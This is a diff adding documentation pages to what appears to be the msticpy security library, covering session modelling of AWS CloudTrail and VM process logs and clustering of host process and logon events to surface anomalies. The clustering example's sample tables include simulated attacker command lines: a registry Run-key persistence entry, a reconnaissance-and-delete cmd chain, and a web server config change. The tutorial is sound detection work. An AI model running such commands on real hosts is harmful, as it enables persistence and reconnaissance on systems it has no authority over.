+
+Recall the allowed session types `here <#what-is-a-session>`__
+
+So let's see what needs to be done to the aws\_df
+
+The "cmds" column is already in a suitable format of type (1). This is
+because it is a list of strings. If we wish to also include the
+parameters (and optionally the corresponding values) to the model, then
+we need to transform the "params" column slightly
+
+.. code:: ipython3
+
+    # define a helper function for converting the sessions with params (and values) into a suitable format
+
+    def process_aws_session(session_with_params: List[Dict[str, Dict[str, any]]], include_vals: bool) -> List[Cmd]:
+        """
+        Converts an aws session with params to an allowed format.
+
+        Parameters
+        ----------
+        session_with_params: example format:
+            [
+                {'GetAuthorizationToken': {'registryIds': ['424246']}},
+                {'GetAuthorizationToken': {'registryIds': ['424246', '654321']}}
+            ]
+            Note that the accompanying values for the parameters can take dynamic
+            types like dict, list etc.
+            However, when we transform the aws session into an allowed format,
+            the value will be cast into a string type.
+
+        include_vals: bool
+            if True, then it will be transformed to a format which
+            includes the values, else the output will just contain the parameters
+
+        Returns
+        -------
+        list :
+            list of the Cmd data type which includes either just the parameters,
+            or also the corresponding values
+        """
+        new_ses = []
+        for cmd in session_with_params:
+            c = list(cmd.keys())[0]
+            par = list(cmd.values())[0]
+            new_pars = set()
+            if include_vals:
+                new_pars = dict()
+            for p, v in par.items():
+                if include_vals:
+                    new_pars[p] = str(v)
+                else:
+                    new_pars.add(p)
+            new_ses.append(Cmd(name=c, params=new_pars))
+        return new_ses
+
+Let's create suitable sessions for params, and suitable sessions for params + values.
+
+.. code:: ipython3
+
+    #
+    sessions = aws_df.cmds.values.tolist()
+    param_sessions = []
+    param_value_sessions = []
+
+    for ses in aws_df.params.values.tolist():
+        new_ses_set = process_aws_session(session_with_params=ses, include_vals=False)
+        new_ses_dict = process_aws_session(session_with_params=ses, include_vals=True)
+        param_sessions.append(new_ses_set)
+        param_value_sessions.append(new_ses_dict)
+
+Let's see the differences between the three types of sessions.
+
+.. code:: ipython3
+
+    ind = 0
+
+    print(sessions[ind][:3])
+    print(param_sessions[ind][:3])
+    print(param_value_sessions[ind][:3])
+
+
+.. parsed-literal::
+
+    ['LookupEvents', 'LookupEvents', 'LookupEvents']
+    [Cmd(name='LookupEvents', params={'startTime', 'endTime'}), Cmd(name='LookupEvents', params={'startTime', 'endTime'}), Cmd(name='LookupEvents', params={'startTime', 'endTime'})]
+    [Cmd(name='LookupEvents', params={'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'}), Cmd(name='LookupEvents', params={'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'}), Cmd(name='LookupEvents', params={'startTime': 'May 28, 2020 3:57:26 AM', 'endTime': 'May 28, 2020 4:02:26 AM'})]
+
+
+.. code:: ipython3
+
+    # let's add these reformatted sessions as columns to a dataframe
+    data = aws_df
+    data['session'] = sessions
+    data['param_session'] = param_sessions
+    data['param_value_session'] = param_value_sessions
+
+Now we will model and visualise these sessions in one go using the
+``score_and_visualise_sessions`` function.
+
+As before, since we created columns for all 3 session types, the
+session\_column argument can be set to any of the following:
+
+-  session
+-  param\_session
+-  param\_value\_session
+
+.. code:: ipython3
+
+    # let's model and visualise these sessions in one go
+
+    anomalous.score_and_visualise_sessions(
+        data=data,
+        session_column='param_session',
+        window_length=3,
+        time_column='begin',
+        source_columns=['UserId', 'ClientIP']
+    )
+
+.. figure:: _static/aws.png
+   :alt: Timeline figure for AWS Cloud Trail sessions
+
+
+
+VM Process Logs
+^^^^^^^^^^^^^^^
+
+The cell below contains a kusto query which queries the VMProcess table
+in Log Analytics. In this example, we wish for the sessions to be on a
+per UserId - Computer basis. In addition, we require that each session
+be no longer than 20 minutes in total, with each command no more than 2
+minutes apart from each other. (These requirements can be adjusted for
+different data-sets/use-cases etc).
+
+Note that in the examples for `Office Activity <#office-activity-logs>`_ and
+`AWS Cloud Trail <#aws-cloud-trail-logs>`__ logs, it was fairly clear cut from
+the data what we could use as parameters for each of the
+events/commands. However, for the VM Process Logs, it is less clear.
+
+Some possible approaches:
+
+1. The command line entries are provided. So a possible approach could
+   be to parse the command line logs into the commands used and their
+   accompanying parameters.
+2. The executable name could be used as the event/command
+
+   a) The services associated with the executable could be used as the
+      parameters
+   b) Or we could use a combination of some other columns as the
+      parameters
+
+In this example, we apply approach (2b). In particular, we use
+"ExecutableName" as the event/command, and the following columns as
+parameters: "DisplayName", "ProductName", "Group", "ProductVersion",
+"ExecutablePath".
+
+.. important:: Some modelling assumptions are made in the
+   anomalous\_sequence subpackage of msticpy.
+
+In particular, when we model the third session type (command + params +
+values), we make the assumption that the values depend only on the
+parameter and not on the command.
+
+This means if we were to treat the parameters as a dictionary for
+example:
+
+.. code::
+
+    Cmd(name="miiserver", params={"ProductVersion": "123542",
+        "ExecutablePath": "a/path"})
+
+Then the value "123542" will be conditioned only on param
+"ProductVersion" and value "a/path" will be conditioned only on param
+"ExecutablePath". But since ProductVersion, and ExecutablePath
+parameters will be present for all the events, this is not useful. We
+want the values to be conditioned on the executable.
+
+Therefore, for this approach, we will use the second session type
+(command + params). For example:
+
+.. code::
+
+    Cmd(name="miiserver", params={"123542", "a/path"})
+
+Now, the presence of "123542" and "a/path" will be modelled
+independently conditional on the executable "miiserver"
+
+(note, this modification is still not perfect, since "123542" and
+"a/path" will each be modelled as Bernoulli instead of categorical. But
+this approach should hopefully still be affective at downscoring the
+likelihood of the rarer param settings conditional on the executable.)
+
+.. code:: ipython3
+
+    query = """
+    let time_back = 7d;
+    VMProcess
+    | where TimeGenerated >= ago(time_back)
+    //
+    // exclude some known automated users
+    | where UserDomain != 'NT AUTHORITY'
+    | extend UserId = strcat(UserName, '--', UserDomain)
+    | where UserId != "--"
+    //
+    // replace backwards slash with forward slash in ExecutablePath and make it lower case
+    | extend path = replace(@'\\\\', @'/',tolower(ExecutablePath))
+    //
+    // create dynamic params variable which has the ExecutableName as the key and some other columns as the values
+    | extend params = todynamic(strcat('{"', ExecutableName, '": ["', DisplayName, '", "', ProductName, '", "', Group,'", "', ProductVersion, '", "', path, '"]}'))
+    //
+    // keep only the needed columns
+    | project TimeGenerated, Computer, UserId, ExecutableName, params
+    //
+    // sort by the user related columns and the timestamp column in ascending order
+    | sort by UserId asc, Computer asc, TimeGenerated asc
+    //
+    // calculate the start time of each session into the "begin" variable
+    // With each session max 20 mins in length with each event at most 2 mins apart.
+    // A new session is created each time one of the user related columns change.
+    | extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or Computer != prev(Computer))
+    //
+    // summarize the executables and the params by the user related variables and the "begin" variable
+    | summarize executables=makelist(ExecutableName), end=max(TimeGenerated), nExecutables=count(),
+        nDistinctExecutables=dcount(ExecutableName), params=makelist(params) by UserId, Computer, begin
+    //
+    // optionally specify an order to the final columns
+    | project UserId, Computer, nExecutables, nDistinctExecutables ,begin, end, duration=end-begin, executables, params
+    //
+    //optionally filter out sessions which contain only one event
+    //| where nExecutables > 1
+    """
+
+.. code:: ipython3
+
+    # execute the query
+    vm_df = qry_prov.exec_query(query=query)
+    # I comment out this cell and run it again once it has run to prevent the notebook from slowing down
+
+.. code:: ipython3
+
+    try:
+        print(vm_df.shape)
+    except AttributeError as e:
+        vm_df = _kql_raw_result_.to_dataframe()
+        print(vm_df.shape)
+
+
+.. parsed-literal::
+
+    (3582, 9)
+
+
+.. code:: ipython3
+
+    vm_df.head()
+
+
+
+
+.. raw:: html
+
+    <div style="overflow: scroll;">
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>UserId</th>
+          <th>Computer</th>
+          <th>nExecutables</th>
+          <th>nDistinctExecutables</th>
+          <th>begin</th>
+          <th>end</th>
+          <th>duration</th>
+          <th>executables</th>
+          <th>params</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>AAD_c47380e4e88e--CONTOSO</td>
+          <td>ContosoDc.Contoso.Azure</td>
+          <td>1</td>
+          <td>1</td>
+          <td>2020-05-21 18:32:45.557000+00:00</td>
+          <td>2020-05-21 18:32:45.557000+00:00</td>
+          <td>0 days</td>
+          <td>[miiserver]</td>
+          <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>AAD_c47380e4e88e--CONTOSO</td>
+          <td>ContosoDc.Contoso.Azure</td>
+          <td>1</td>
+          <td>1</td>
+          <td>2020-05-21 19:32:45.731000+00:00</td>
+          <td>2020-05-21 19:32:45.731000+00:00</td>
+          <td>0 days</td>
+          <td>[miiserver]</td>
+          <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>AAD_c47380e4e88e--CONTOSO</td>
+          <td>ContosoDc.Contoso.Azure</td>
+          <td>1</td>
+          <td>1</td>
+          <td>2020-05-21 20:32:45.911000+00:00</td>
+          <td>2020-05-21 20:32:45.911000+00:00</td>
+          <td>0 days</td>
+          <td>[miiserver]</td>
+          <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>AAD_c47380e4e88e--CONTOSO</td>
+          <td>ContosoDc.Contoso.Azure</td>
+          <td>1</td>
+          <td>1</td>
+          <td>2020-05-21 21:32:46.104000+00:00</td>
+          <td>2020-05-21 21:32:46.104000+00:00</td>
+          <td>0 days</td>
+          <td>[miiserver]</td>
+          <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>AAD_c47380e4e88e--CONTOSO</td>
+          <td>ContosoDc.Contoso.Azure</td>
+          <td>1</td>
+          <td>1</td>
+          <td>2020-05-21 22:32:46.271000+00:00</td>
+          <td>2020-05-21 22:32:46.271000+00:00</td>
+          <td>0 days</td>
+          <td>[miiserver]</td>
+          <td>[{'miiserver': ['miiserver', 'Microsoft® Azure® AD Connect', 'Microsoft® Azure® AD Connect',...</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+
+
+Convert VM Process sessions to the correct format for the model
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Recall the allowed session types `here <#what-is-a-session>`__
+
+So let's see what needs to be done to the vm\_df
+
+The "executables" column is already in a suitable format of type (1).
+This is because it is a list of strings. If we wish to also include the
+parameters to the model, then we need to transform the "params" column
+slightly.
+
+.. code:: ipython3
+
+    # define a helper function for converting the sessions with params into a suitable format
+
+    def process_vm_session(session_with_params: List[Dict[str, Dict[str, any]]]) -> List[Cmd]:
+        """
+        Converts a vm session with params to an allowed format.
+
+        param session_with_params: example format:
+             [{'Explorer': ['Explorer','Microsoft® Windows® Operating System',
+               'Microsoft® Windows® Operating System', '10.0.14393.0', 'c:/windows/explorer.exe']}]
+
+        return: list of the Cmd data type which includes the parameters
+        """
+        new_ses = []
+        for cmd in session_with_params:
+            c = list(cmd.keys())[0]
+            par = list(cmd.values())[0]
+            new_pars = set(par)
+            new_ses.append(Cmd(name=c, params=new_pars))
+        return new_ses
+
+.. code:: ipython3
+
+    # let's create suitable sessions for params
+    sessions = vm_df.executables.values.tolist()
+    param_sessions = []
+
+    for ses in vm_df.params.values.tolist():
+        new_ses_set = process_vm_session(session_with_params=ses)
+        param_sessions.append(new_ses_set)
+
+.. code:: ipython3
+
+    # let's see the differences between the two types of sessions
+    ind = 0
+
+    print(sessions[ind])
+
+    print(param_sessions[ind])
+
+
+.. parsed-literal::
+
+    ['miiserver']
+    [Cmd(name='miiserver', params={'c:/program files/microsoft azure ad sync/bin/miiserver.exe', 'miiserver', 'Microsoft® Azure® AD Connect', '1.5.30.0'})]
+
+
+.. code:: ipython3
+
+    # let's add these reformatted sessions as columns to a dataframe
+    data = vm_df
+    data['session'] = sessions
+    data['param_session'] = param_sessions
+
+Now we will model and visualise these sessions using the
+``score_and_visualise_sessions`` function.
+
+As before, since we created columns for 2 of the 3 session types, the
+session\_column argument can be set to any of the following:
+
+-  session
+-  param\_session
+
+.. code:: ipython3
+
+    # let's model and visualise these sessions in one go
+
+    anomalous.score_and_visualise_sessions(
+        data=data,
+        session_column='param_session',
+        window_length=3,
+        time_column='begin',
+        source_columns=['UserId', 'Computer']
+    )
+
+.. figure:: _static/vm.png
+   :alt: Timeline figure for VM Process sessions
diff --git a/docs/source/data_analysis/Base64Unpack.rst b/docs/source/data_analysis/Base64Unpack.rst
new file mode 100644
index 000000000..d7b3c649a
Binary files /dev/null and b/docs/source/data_analysis/Base64Unpack.rst differ
diff --git a/docs/source/data_analysis/EventClustering.rst b/docs/source/data_analysis/EventClustering.rst
new file mode 100644
index 000000000..becf80b37
--- /dev/null
+++ b/docs/source/data_analysis/EventClustering.rst
@@ -0,0 +1,466 @@
+Event Clustering
+================
+
+Large sets of events often contain a lot of very repetitive items. As
+security investigators, we are typically looking for anomalous events
+and this repetitive noise can make it difficult to see the more unusual
+events that we're searching for.
+
+Sometimes you can you can use simple sorting and grouping to manage
+the duplicates. On other occasions, there are values that almost repeat
+but each instance is subtley different.
+
+Some examples might be a system process that runs repeatedly but each
+time it has commandline that includes a timestamp, guid or perhaps a
+remote host name or address. This unique content makes it difficult
+to use standard sorting and grouping to uncover truly distinct activity.
+
+At the same time we want to use a technique to uncover anomalies that
+is sensitive to slightly different usage of common operations. Examples
+might be:
+
+-  a browser User Agent string that has been crafted to look like a
+   common browser
+-  a process on a path designed to look like a common process
+-  a common system command that is being used in an unusual way
+
+We can use clustering, together with appropriate feature
+selection, to help us differentiate between repetitive events
+and truly unusual instances.
+
+One of the problems with using common
+machine learning techniques with log data is that machine learning
+packages usually expect features to be represented as numeric values
+whereas we a typically working with text data. One of the challenges
+will be creating a numeric representation of the features that we
+are interested in that captures the anomaly patterns that we want
+to find.
+
+
+.. code:: ipython3
+
+    # Imports
+    import sys
+    import warnings
+
+    from msticpy.common.utility import check_py_version
+    MIN_REQ_PYTHON = (3,6)
+    check_py_version(MIN_REQ_PYTHON)
+
+    from IPython import get_ipython
+    from IPython.display import display, HTML, Markdown
+    import ipywidgets as widgets
+
+    import matplotlib.pyplot as plt
+    import seaborn as sns
+    sns.set()
+    import networkx as nx
+
+    import pandas as pd
+    pd.set_option('display.max_rows', 100)
+    pd.set_option('display.max_columns', 50)
+    pd.set_option('display.max_colwidth', 100)
+
+    from msticpy.data import QueryProvider
+    from msticpy.nbtools import *
+    from msticpy.sectools import *
+    from msticpy.nbtools.foliummap import FoliumMap
+
+    WIDGET_DEFAULTS = {'layout': widgets.Layout(width='95%'),
+                       'style': {'description_width': 'initial'}}
+
+    # Some of our dependencies (networkx) still use deprecated Matplotlib
+    # APIs - we can't do anything about it so suppress them from view
+    from matplotlib import MatplotlibDeprecationWarning
+    warnings.simplefilter("ignore", category=MatplotlibDeprecationWarning)
+
+
+
+
+
+Processes on Host - Clustering
+------------------------------
+
+Sometimes you
+don’t have a source process to work with. Other times it’s just useful
+to see what else is going on on the host. This section retrieves all
+processes on the host within the time bounds set in the query times
+widget.
+
+You can display the raw output of this by looking at the
+*processes_on_host* dataframe. Just copy this into a new cell and hit
+Ctrl-Enter.
+
+Usually though, the results return a lot of very repetitive and
+uninteresting system processes so we attempt to cluster these to make the
+view easier to negotiate. To do this we process the raw event list
+output to extract a few features that render strings (such as
+commandline)into numerical values. The default below uses the following
+features: - commandLineTokensFull - this is a count of common delimiters
+in the commandline (given by this regex
+``[\s\-\/.,"'|&:;%$()]``. The aim of this is to capture the
+commandline structure while ignoring variations on what is essentially
+the same pattern (e.g. temporary path GUIDs, target IP or host names,
+etc.) - pathScore - this sums the ordinal (character) value of each
+character in the path (so /bin/bash and /bin/bosh would have similar
+scores). - isSystemSession - 1 if this is a root/system session, 0 if
+anything else.
+
+Then we run a clustering algorithm (DBScan in this case) on the process
+list. The result groups similar (noisy) processes together and leaves
+unique process patterns as single-member clusters.
+
+Clustered Processes (i.e. processes that have a cluster size > 1)
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+.. code:: ipython3
+
+    from msticpy.analysis.eventcluster import dbcluster_events, add_process_features
+    processes_on_host = pd.read_csv('data/processes_on_host.csv',
+                                    parse_dates=["TimeGenerated"],
+                                    infer_datetime_format=True)
+
+    feature_procs = add_process_features(input_frame=processes_on_host)
+
+
+    # you might need to play around with the max_cluster_distance parameter.
+    # decreasing this gives more clusters.
+    (clus_events, dbcluster, x_data) = dbcluster_events(
+        data=feature_procs,
+        cluster_columns=['commandlineTokensFull',
+                        'pathScore',
+                        'isSystemSession'],
+        max_cluster_distance=0.0001
+    )
+    print('Number of input events:', len(feature_procs))
+    print('Number of clustered events:', len(clus_events))
+    (clus_events[['ClusterSize', 'processName']]
+                [clus_events['ClusterSize'] > 1]
+                .plot.bar(x='processName',
+                          title='Process names with Cluster > 1',
+                          figsize=(12,3)));
+
+
+.. parsed-literal::
+
+    Number of input events: 363
+    Number of clustered events: 62
+
+
+
+.. image:: _static/EventClustering_1.png
+
+
+.. code:: ipython3
+
+    # Looking at the variability of commandlines and process image paths
+    import seaborn as sns
+    sns.set(style="darkgrid")
+
+    proc_plot = sns.catplot(y="processName", x="commandlineTokensFull",
+                            data=feature_procs.sort_values('processName'),
+                            kind='box', height=10)
+    proc_plot.fig.suptitle('Variability of Commandline Tokens', x=1, y=1)
+
+    proc_plot = sns.catplot(y="processName", x="pathLogScore",
+                            data=feature_procs.sort_values('processName'),
+                            kind='box', height=10, hue='isSystemSession')
+    proc_plot.fig.suptitle('Variability of Path', x=1, y=1);
+
+
+
+.. image:: _static/EventClustering_2a.png
+
+
+
+.. image:: _static/EventClustering_2b.png
+
+
+The top graph shows that, for a given process, some have a wide
+variability in their command line content while the majority have little
+or none. Looking at a couple of examples - like cmd.exe, powershell.exe,
+reg.exe, net.exe - we can recognize several common command line tools.
+
+The second graph shows processes by full process path content. We
+wouldn’t normally expect to see variation here - as is the cast with
+most. There is also quite a lot of variance in the score making it a
+useful proxy feature for unique path name (this means that proc1.exe and
+proc2.exe that have the same commandline score won’t get collapsed into
+the same cluster).
+
+Any process with a spread of values here means that we are seeing the
+same process name (but not necessarily the same file) is being run from
+different locations.
+
+.. code:: ipython3
+
+    display(clus_events.sort_values('ClusterSize')[['TimeGenerated', 'LastEventTime',
+                                                    'NewProcessName', 'CommandLine',
+                                                    'ClusterSize', 'commandlineTokensFull',
+                                                    'pathScore', 'isSystemSession']])
+
+
++-----+--------------------------+--------------------------+--------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+--------------+------------------------+------------+------------------+
+|     | TimeGenerated            | LastEventTime            | NewProcessName                                                                                   | CommandLine                                                                                          | ClusterSize  | commandlineTokensFull  | pathScore  | isSystemSession  |
++=====+==========================+==========================+==================================================================================================+======================================================================================================+==============+========================+============+==================+
+| 46  | 2019-01-15 04:23:43.103  | 2019-01-15 05:15:20.623  | C:\Diagnostics\UserTmp\reg.exe                                                                   | .\reg  not /domain:everything that /sid:shines is /krbtgt:golden !                                   | 1            | 16                     | 2951       | False            |
++-----+--------------------------+--------------------------+--------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+--------------+------------------------+------------+------------------+
+| 356 | 2019-01-15 04:23:43.103  | 2019-01-15 05:15:20.623  | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe  | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe...  | 1            | 27                     | 9108       | True             |
++-----+--------------------------+--------------------------+--------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+--------------+------------------------+------------+------------------+
+| 301 | 2019-01-15 04:23:43.103  | 2019-01-15 05:15:20.623  | C:\Windows\System32\cmd.exe                                                                      | "cmd"                                                                                                | 1            | 2                      | 2570       | True             |
++-----+--------------------------+--------------------------+--------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+--------------+------------------------+------------+------------------+
+| 256 | 2019-01-15 04:23:43.103  | 2019-01-15 05:15:20.623  | C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe                  | "CollectGuestLogs.exe" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df...  | 1            | 18                     | 6421       | True             |
++-----+--------------------------+--------------------------+--------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+--------------+------------------------+------------+------------------+
+| 219 | 2019-01-15 04:23:43.103  | 2019-01-15 05:15:20.623  | C:\Windows\System32\wermgr.exe                                                                   | C:\Windows\system32\wermgr.exe -upload                                                               | 1            | 7                      | 2922       | True             |
++-----+--------------------------+--------------------------+--------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+--------------+------------------------+------------+------------------+
+| 198 | 2019-01-15 04:23:43.103  | 2019-01-15 05:15:20.623  | C:\Diagnostics\UserTmp\cmd.exe                                                                   | cmd  /c echo " SYSTEMINFO && SYSTEMINFO && DEL "                                                     | 1            | 17                     | 2941       | False            |
++-----+--------------------------+--------------------------+--------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+--------------+------------------------+------------+------------------+
+| 195 | 2019-01-15 04:23:43.103  | 2019-01-15 05:15:20.623  | C:\Diagnostics\UserTmp\cmd.exe                                                                   | cmd  /c "cd /d "C:\inetpub\wwwroot"&c:\windows\system32\inetsrv\appcmd set config "Default Web S...  | 1            | 39                     | 2941       | False            |
++-----+--------------------------+--------------------------+--------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------+--------------+------------------------+------------+------------------+
+
+
+
+.. code:: ipython3
+
+    # Look at clusters for individual process names
+    def view_cluster(exe_name):
+        display(clus_events[['ClusterSize', 'processName', 'CommandLine', 'ClusterId']][clus_events['processName'] == exe_name])
+    view_cluster('reg.exe')
+
+
++-----+--------------+--------------+---------------------------------------------------------------------+------------+
+|     | ClusterSize  | processName  | CommandLine                                                         | ClusterId  |
++=====+==============+==============+=====================================================================+============+
+| 46  | 1            | reg.exe      | .\reg  not /domain:everything that /sid:shines is /krbtgt:golden !  | -1         |
++-----+--------------+--------------+---------------------------------------------------------------------+------------+
+| 56  | 3            | reg.exe      | .\reg.exe  add \hkcu\software\microsoft\some\key\Run /v abadvalue   | 7          |
++-----+--------------+--------------+---------------------------------------------------------------------+------------+
+
+
+
+.. code:: ipython3
+
+    # Show all clustered processes
+    from msticpy.analysis.eventcluster import plot_cluster
+    # Create label with unqualified path
+    labelled_df = processes_on_host.copy()
+    labelled_df['label'] = labelled_df.apply(lambda x: x.NewProcessName.split("\\")[-1], axis=1)
+
+    %matplotlib inline
+    #%matplotlib notebook
+    plt.rcParams['figure.figsize'] = (15,10)
+    plot_cluster(dbcluster, labelled_df, x_data, plot_label='label', plot_features=[0,1], verbose=False, cut_off=3,
+                 xlabel='CmdLine Tokens', ylabel='Path Score');
+
+
+
+
+.. image:: _static/EventClustering_3.png
+
+
+Timeline showing clustered vs. original data
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    # Show timeline of events - clustered events
+    nbdisplay.display_timeline(data=clus_events,
+                              overlay_data=processes_on_host,
+                              title='Distinct Host Processes (bottom) and All Proceses (top)')
+
+
+
+.. image:: _static/EventClustering_4.png
+
+
+Host Logons
+-----------
+
+Since the number of logon events may be large and, in the case of system
+logons, very repetitive, we use clustering to try to identity logons
+with unique characteristics.
+
+In this case we use the numeric score of the account name and the logon
+type (i.e. interactive, service, etc.). The results of the clustered
+logons are shown below along with a more detailed, readable printout of
+the logon event information. The data here will vary depending on
+whether this is a Windows or Linux host.
+
+.. code:: ipython3
+
+    from msticpy.analysis.eventcluster import dbcluster_events, add_process_features, _string_score
+
+    host_logons = pd.read_csv('data/host_logons.csv',
+                              parse_dates=["TimeGenerated"],
+                              infer_datetime_format=True)
+    logon_features = host_logons.copy()
+    logon_features['AccountNum'] = host_logons.apply(lambda x: _string_score(x.Account), axis=1)
+    logon_features['LogonHour'] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)
+
+    # you might need to play around with the max_cluster_distance parameter.
+    # decreasing this gives more clusters.
+    (clus_logons, _, _) = dbcluster_events(data=logon_features, time_column='TimeGenerated',
+                                           cluster_columns=['AccountNum',
+                                                            'LogonType'],
+                                                             max_cluster_distance=0.0001)
+    print('Number of input events:', len(host_logons))
+    print('Number of clustered events:', len(clus_logons))
+    print('\nDistinct host logon patterns:')
+    display(clus_logons.sort_values('TimeGenerated'))
+
+
+
+.. parsed-literal::
+
+    Number of input events: 14
+    Number of clustered events: 3
+
+    Distinct host logon patterns:
+
+
++---+--------------------------------+----------+--------------------------+------------------+------------------+------------+------------+------------+--------------+--------------------------+--------------------------+
+|   | Account                        | EventID  | TimeGenerated            | Computer         | SubjectUserName  | LogonHour  | Clustered  | ClusterId  | ClusterSize  | FirstEventTime           | LastEventTime            |
++===+================================+==========+==========================+==================+==================+============+============+============+==============+==========================+==========================+
+| 1 | NT AUTHORITY\SYSTEM            | 4624     | 2019-01-15 01:42:28.340  | MSTICAlertsWin1  | MSTICAlertsWin1$ | 5          | True       | 1          | 11           | 2019-01-15 01:42:28.340  | 2019-01-15 05:15:14.453  |
++---+--------------------------------+----------+--------------------------+------------------+------------------+------------+------------+------------+--------------+--------------------------+--------------------------+
+| 0 | MSTICAlertsWin1\MSTICAdmin     | 4624     | 2019-01-15 04:28:33.090  | MSTICAlertsWin1  | MSTICAlertsWin1$ | 5          | True       | 0          | 2            | 2019-01-15 04:28:33.090  | 2019-01-15 05:15:02.980  |
++---+--------------------------------+----------+--------------------------+------------------+------------------+------------+------------+------------+--------------+--------------------------+--------------------------+
+| 2 | MSTICAlertsWin1\adm1nistrator  | 4624     | 2019-01-15 05:15:06.363  | MSTICAlertsWin1  | -                | 5          | False      | -1         | 1            | 2019-01-15 05:15:06.363  | 2019-01-15 05:15:06.363  |
++---+--------------------------------+----------+--------------------------+------------------+------------------+------------+------------+------------+--------------+--------------------------+--------------------------+
+
+
+.. code:: ipython3
+
+    # Display logon details
+    nbdisplay.display_logon_data(clus_logons)
+
+
+.. parsed-literal::
+
+    ### Account Logon
+    Account:  adm1nistrator
+    Account Domain:  MSTICAlertsWin1
+    Logon Time:  2019-01-15 05:15:06.363000
+    Logon type: 3  (Network)
+    User Id/SID:  S-1-5-21-996632719-2361334927-4038480536-1066
+        SID S-1-5-21-996632719-2361334927-4038480536-1066 is local machine or domain account
+    Session id '0xfb5ee6'
+    Subject (source) account:  -/-
+    Logon process:  NtLmSsp
+    Authentication:  NTLM
+    Source IpAddress:  fe80::38dc:e4a9:61bd:b458
+    Source Host:  MSTICAlertsWin1
+    Logon status:  nan
+
+    ### Account Logon
+    Account:  MSTICAdmin
+    Account Domain:  MSTICAlertsWin1
+    Logon Time:  2019-01-15 04:28:33.090000
+    Logon type: 4  (Batch)
+    User Id/SID:  S-1-5-21-996632719-2361334927-4038480536-500
+        SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator
+        SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account
+    Session id '0xfaac27'
+    Subject (source) account:  WORKGROUP/MSTICAlertsWin1$
+    Logon process:  Advapi
+    Authentication:  Negotiate
+    Source IpAddress:  -
+    Source Host:  MSTICAlertsWin1
+    Logon status:  nan
+
+    ### Account Logon
+    Account:  SYSTEM
+    Account Domain:  NT AUTHORITY
+    Logon Time:  2019-01-15 01:42:28.340000
+    Logon type: 5  (Service)
+    User Id/SID:  S-1-5-18
+        SID S-1-5-18 is LOCAL_SYSTEM
+    Session id '0x3e7'  System logon session
+
+    Subject (source) account:  WORKGROUP/MSTICAlertsWin1$
+    Logon process:  Advapi
+    Authentication:  Negotiate
+    Source IpAddress:  -
+    Source Host:  -
+    Logon status:  nan
+
+
+
+Comparing All Logons with Clustered results relative to Alert time line
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+.. code:: ipython3
+
+    # Show timeline of events - all logons + clustered logons
+    # ref marker indicates
+    logon_data = {"Clustered": {"data": clus_logons},
+                  "All Logons": {"data": host_logons}}
+    nbdisplay.display_timeline(data=logon_data,
+                               source_columns=['Account', 'LogonType'],
+                               ref_event=clus_logons.iloc[0],
+                               title='All Host Logons', legend="inline")
+
+
+.. image:: _static/EventClustering_5.png
+
+
+
+View Process Session and Logon Events in Timelines
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This shows the timeline of the clustered logon events with the process
+tree obtained earlier. This allows you to get a sense of which logon was
+responsible for the process tree session whether any additional logons
+(e.g. creating a process as another user) might be associated with the
+alert timeline.
+
+.. tip:: Use the pan and zoom tools to align the timelines since
+   the data may be over different time ranges.
+
+.. code:: ipython3
+
+    # Show timeline of events - all events
+    nbdisplay.display_timeline(data=clus_logons,
+                               source_columns=['Account', 'LogonType'],
+                               title='Clustered Host Logons', height=200)
+    process_tree = pd.read_csv('data/process_tree.csv',
+                               parse_dates=["TimeGenerated"],
+                               infer_datetime_format=True)
+    nbdisplay.display_timeline(data=process_tree,
+                               title='Alert Process Session', height=200)
+
+
+
+.. image:: _static/EventClustering_6.png
+
+
+
